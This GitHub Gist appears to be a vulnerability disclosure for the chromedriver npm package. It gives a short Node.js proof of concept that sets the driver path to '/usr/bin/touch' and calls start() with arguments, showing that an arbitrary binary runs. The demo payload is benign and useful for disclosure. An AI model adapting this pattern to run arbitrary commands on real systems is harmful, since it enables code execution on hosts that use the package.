Skip to content

Instantly share code, notes, and snippets.

@mcoimbra
Created October 26, 2023 17:02
Package chromedriver: possible to do command injection by manipulating the arguments.
'use strict'
const chromedriver = require('chromedriver');
const args = ['exploited.txt'];
const returnPromise = false;
chromedriver.path = '/usr/bin/touch';
// This creates a local 'exploited.txt' file.
chromedriver.start(args, returnPromise);
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment